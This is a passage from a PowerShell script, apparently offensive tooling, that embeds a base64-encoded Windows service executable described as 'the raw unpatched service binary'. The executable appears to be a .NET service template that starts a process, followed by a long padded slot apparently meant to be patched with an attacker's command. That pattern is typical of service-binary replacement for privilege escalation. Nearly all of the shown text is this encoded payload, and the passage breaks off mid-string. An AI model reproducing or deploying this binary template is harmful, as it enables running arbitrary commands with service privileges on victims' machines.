\"$(Convert-Path .)\\service.exe\"\n    )\n\n    BEGIN {\n        # the raw unpatched service binary\n        $B64Binary = \"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UmVmbGVjdGlvbgBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlDdWx0dXJlQXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBDb21WaXNpYmxlQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAQXNzZW1ibHlWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAU3lzdGVtLkRpYWdub3N0aWNzAERlYnVnZ2FibGVBdHRyaWJ1dGUARGVidWdnaW5nTW9kZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAElEaXNwb3NhYmxlAENvbnRhaW5lcgBTdHJpbmcAVHJpbQBzZXRfU2VydmljZU5hbWUAUHJvY2VzcwBTdGFydABTeXN0ZW0uVGhyZWFkaW5nAFRocmVhZABTbGVlcABFbnZpcm9ubWVudABFeGl0AFJ1bgAARUEAQQBBACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAAL/3LwBDACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA